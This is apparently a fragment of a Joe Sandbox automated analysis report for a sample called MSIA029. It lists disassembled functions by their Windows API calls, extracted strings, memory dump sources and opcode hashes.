                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F67125,00000001,00F8A1D8,0000000C,00F67554,00000000), ref: 00F6716A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F6E01F,00000001,?,?,?,00F6E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6E0FD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
APIs
• GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00F500E2,00000000,00000000,00000004,00F4ED14,00000000,00000004,00F4F127,00000000,00000000), ref: 00F52410
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F64E3F,?,20001004,00000000,00000002,?,?,00F64441), ref: 00F676E3
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00F53077), ref: 00F53544
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
  • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CA3
  • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,80A20388,?,?,00F73D6D,000000FF), ref: 00F52CE0
• GetProcessHeap.KERNEL32 ref: 00F32365
  • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
  • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
  • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
• String ID:
• API String ID: 325507722-0
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
• Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7c80f69da2586a31788134cf1d1ff637f39bf68e53c2c04abeb3e4c3a423148f
                                                                                                                                                                                                                                                  • Instruction ID: b7b6568724645beba5fba9c8eadae0439f59ac61d9fed8c609fd2d85b1a33cfd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c80f69da2586a31788134cf1d1ff637f39bf68e53c2c04abeb3e4c3a423148f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D32F122D29F454DD7239634CC62379A28CEFB73D4F15D727E81AB5AA9EB3884C36101
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 56f70f2eaafb2dd7f169aff675c4dc991a46e332bd82c4e4c88ac1b37ebf8247
                                                                                                                                                                                                                                                  • Instruction ID: 7f33276c634c95cd9529e5da94a5b3bfe0334d2c7ea9d3ce26b9bed6bbddf0c6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56f70f2eaafb2dd7f169aff675c4dc991a46e332bd82c4e4c88ac1b37ebf8247
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2E1EE30A00605CFCB24CF28C580A7AB7F1FF49322B244749DE569B690D734ED5AEB52
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
Similarity
• API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
• String ID:
• API String ID: 3471368781-0
Memory Dump Source
• Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
APIs
• __EH_prolog3.LIBCMT ref: 00F5011D
• collate.LIBCPMT ref: 00F50126
  • Part of subcall function 00F4EDF2: __EH_prolog3_GS.LIBCMT ref: 00F4EDF9
  • Part of subcall function 00F4EDF2: __Getcoll.LIBCPMT ref: 00F4EE5D
• __Getcoll.LIBCPMT ref: 00F5016C
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50180
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50195
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501D3
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501E6
• std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5022C
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50260
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5031B
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5032E
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5034B
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50368
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50385
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F502BD
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • numpunct.LIBCPMT ref: 00F503C4
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F503D4
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50418
                                                                                                                                                                                                                                                    • Part of subcall function 00F36330: LocalAlloc.KERNEL32(00000040,?,00F40E04,00000020,?,?,00F39942,00000000,80A20388,?,?,?,?,00F750DD,000000FF), ref: 00F36336
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5042B
                                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50448
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3717464618-0
                                                                                                                                                                                                                                                  • Opcode ID: 6e77e970c2613771671f229a03f8fbb4093420540f53e6d14ee3edb759d457b9
                                                                                                                                                                                                                                                  • Instruction ID: aa78346c2aa716e0a0439680fd1444c1d8fc99038c2461ebf04396bd0b60ef30
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e77e970c2613771671f229a03f8fbb4093420540f53e6d14ee3edb759d457b9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F191B671D012116BEB207BB44C46BBF7AA8EF417B1F108429FD4DA7282DE784905B7B2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366D7
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366E2
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366FE
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367DB
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367E7
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F3682F
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3684A
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F36867
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F36891
                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00F368D8
                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00F3692A
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3695C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                                                                                                  • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                                                                                                  • API String ID: 2199533872-3004881174
                                                                                                                                                                                                                                                  • Opcode ID: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                                                                                                  • Instruction ID: c9d604e0b268398b842c852dd607f156e5240a35f326310439f8eebfaeb73a52
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BB12571D04249AFEB20DF64CC86BEFBBB5AF05720F108129E504EB2C1DB749A48D7A1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00F8DD3C,00000FA0,?,?,00F52B6A), ref: 00F52B98
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00F52B6A), ref: 00F52BA3
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F52B6A), ref: 00F52BB4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F52BC6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F52BD4
                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F52B6A), ref: 00F52BF7
                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00F8DD3C,00000007,?,?,00F52B6A), ref: 00F52C13
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00F52B6A), ref: 00F52C23
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F52B9E
                                                                                                                                                                                                                                                  • SleepConditionVariableCS, xrefs: 00F52BC0
                                                                                                                                                                                                                                                  • WakeAllConditionVariable, xrefs: 00F52BCC
                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 00F52BAF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                  • Opcode ID: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                                                                                                  • Instruction ID: 5f3c1c3c5ad97a37938eb315523f08950e66c4572684d0d66557e95ba1cabadb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB01B572A54315ABD6213F75AC0CE667B689F827627014911FE08D22E0EBB4C845FB63
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55DAC
                                                                                                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00F55DCE
                                                                                                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00F55EDD
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55FAF
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00F56033
                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00F5604E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 2123188842-393685449
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,80A20388,?,?,?), ref: 00F342D2
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,80A20388,?,?,?), ref: 00F342F3
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34326
                                                                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,80A20388,?,?,?), ref: 00F34337
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34355
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34371
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F34399
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F343B5
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F343D3
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,80A20388,?,?,?), ref: 00F343EF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1711917922-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4BBC4
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                  • API String ID: 1538362411-2891247106
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F50CA4
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
